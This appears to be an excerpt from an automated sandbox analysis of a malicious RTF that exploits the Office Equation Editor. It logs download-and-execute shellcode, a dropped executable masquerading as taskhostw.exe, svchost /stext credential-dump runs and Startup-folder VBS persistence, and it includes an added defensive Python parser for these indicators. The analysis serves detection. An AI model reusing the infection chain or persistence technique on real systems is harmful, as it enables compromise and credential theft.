Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: WC5Gv13cOQ.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\WC5Gv13cOQ.rtf
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.364862213.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.364383190.0000000001150000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394321762.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394032155.00000000029C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress, 5_2_00D6C104
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067A461 push ecx; ret 2_2_0067A463
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678C68 push ebx; ret 2_2_00678D23
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AC4F push eax; ret 2_2_0067AC53
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AC57 push eax; ret 2_2_0067AC5B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AE5C push eax; ret 2_2_0067AE6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067A45A push ecx; ret 2_2_0067A45B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006806F9 push ecx; ret 2_2_006806FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00680AC1 push eax; ret 2_2_00680AC3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678D27 push ebx; ret 2_2_00678D2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067852A push eax; ret 2_2_00678643
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678D31 push ebx; ret 2_2_00678D33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0068171C push edx; ret 2_2_00681723
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006787E6 push edx; ret 2_2_006787E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006787EE push edx; ret 2_2_006787EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067ABE8 push eax; ret 2_2_0067ABEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006819FC push edx; ret 2_2_006822D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067ABF0 push eax; ret 2_2_0067ABF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067B3FC push edx; ret 2_2_0067B6CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006807C7 push ecx; ret 2_2_006807CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006825AA push edx; ret 2_2_006825AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006825A2 push edx; ret 2_2_006825A3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00680B90 push eax; ret 2_2_00680B93
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E20A push esi; retf 5_3_02B0E20D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E6C2 push 7E000BC3h; ret 5_3_02B0E6D1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E7F2 push cs; ret 5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E4C8 push ss; iretd 5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E596 push ss; iretd 5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8F4 push eax; retn 000Bh 5_3_02B0E8F5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8E4 pushfd ; retn 000Bh 5_3_02B0E8E5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8E8 push cs; ret 5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E900 push ds; retn 000Bh 5_3_02B0E945
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F21
Source: C:\Users\user\AppData\Roaming\taskhostw.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
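Three of the "File created" events on this page tell the drop-and-persist story on their own: the copy under Temporary Internet Files\Content.IE5 with the "[1]" suffix is how WinINet names cached downloads, which matches the URLDownloadToFileW call in the EQNEDT32.EXE shellcode; the payload is then written to AppData\Roaming under the name of a real Windows binary; and name.exe finally plants name.vbs in the per-user Startup folder so wscript.exe re-launches it at logon. The script below is an added example (not the sandbox's or the malware author's code) that classifies such lines and, for a live host, enumerates the Startup folders and pulls any .exe path out of the scripts found there. The report lines are copied from this page; the contents of the demo name.vbs are an assumption, since the page does not show the script body.

```python
import os
import re
import tempfile

DROP_RE = re.compile(r'^Source: (?P<source>.+?) File created: (?P<path>.+?)(?: Jump to .*)?$')
WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARY_NAMES = {"svchost.exe", "taskhostw.exe"}
STARTUP_MARK = "\\start menu\\programs\\startup\\"
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
PE_EXTS = {".exe", ".dll", ".scr"}
CACHE_RE = re.compile(r'\[\d+\](?=\.[^.\\]+$)')        # the "[1]" WinINet adds to cached names
EXE_REF_RE = re.compile(r'[A-Za-z]:\\[^"\r\n]*?\.exe', re.IGNORECASE)

# Constructed sample input: "File created" lines copied from this report.
SAMPLE_DROPS = r"""
Source: C:\Users\user\AppData\Roaming\taskhostw.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
"""


def classify_drop(path):
    """Tags describing why a dropped file matters (empty list = nothing odd)."""
    low = path.lower()
    name = low.rsplit("\\", 1)[-1]
    plain = CACHE_RE.sub("", name)                       # taskhostw[1].exe -> taskhostw.exe
    ext = os.path.splitext(plain)[1]
    tags = []
    if STARTUP_MARK in low and (ext in SCRIPT_EXTS or ext in PE_EXTS or ext == ".lnk"):
        tags.append("startup-folder-persistence")
    if "\\content.ie5\\" in low and ext in PE_EXTS:
        tags.append("wininet-cache-download")            # URLDownloadToFileW leaves the file here
    if plain in SYSTEM_BINARY_NAMES and not low.startswith(WINDOWS_DIRS):
        tags.append("system-binary-name-masquerade")
    if ext in PE_EXTS and "\\appdata\\" in low and "\\content.ie5\\" not in low:
        tags.append("pe-dropped-in-appdata")
    return tags


def parse_drops(report):
    out = []
    for line in report.splitlines():
        m = DROP_RE.match(line.strip())
        if m:
            out.append((m["source"], m["path"], classify_drop(m["path"])))
    return out


def default_startup_folders():
    """Per-user and all-users Startup folders on a Windows host (empty list elsewhere)."""
    out = []
    for var, tail in (("APPDATA", r"Microsoft\Windows\Start Menu\Programs\Startup"),
                      ("ProgramData", r"Microsoft\Windows\Start Menu\Programs\StartUp")):
        base = os.environ.get(var)
        if base:
            out.append(os.path.join(base, tail))
    return out


def find_startup_scripts(folders):
    """Script/PE files in the given Startup folders; for scripts, the .exe paths they reference."""
    found = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for fname in sorted(os.listdir(folder)):
            ext = os.path.splitext(fname)[1].lower()
            if ext not in SCRIPT_EXTS and ext not in PE_EXTS:
                continue
            full = os.path.join(folder, fname)
            refs = []
            if ext in SCRIPT_EXTS:
                with open(full, "r", errors="replace") as fh:
                    refs = EXE_REF_RE.findall(fh.read())
            found.append({"file": full, "launches": refs})
    return found


def build_demo_startup_folder():
    """Constructed stand-in for the Startup folder: a name.vbs that runs name.exe (assumed content)."""
    folder = tempfile.mkdtemp(prefix="startup_demo_")
    with open(os.path.join(folder, "name.vbs"), "w") as fh:
        fh.write('Set sh = CreateObject("WScript.Shell")\r\n'
                 'sh.Run """C:\\Users\\user\\AppData\\Local\\directory\\name.exe""", 0, False\r\n')
    return folder


if __name__ == "__main__":
    for source, path, tags in parse_drops(SAMPLE_DROPS):
        print(f"{path}\n    by {source}\n    {tags}")
    for hit in find_startup_scripts(default_startup_folders() or [build_demo_startup_folder()]):
        print(hit)
```

On a real host the Startup scan runs against the actual folders; the demo folder is used only when no APPDATA/ProgramData is set, which is the case off Windows. The masquerade and Startup checks are the same signals the Sigma hits in the overview ("Drops script at startup location", "File Dropped By EQNEDT32EXE") fire on.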
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 7_2_0041AADB
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00CF4A35
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D753DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_00D753DF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01394A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_01394A35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_014153DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_014153DF
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D13307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00D13307
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
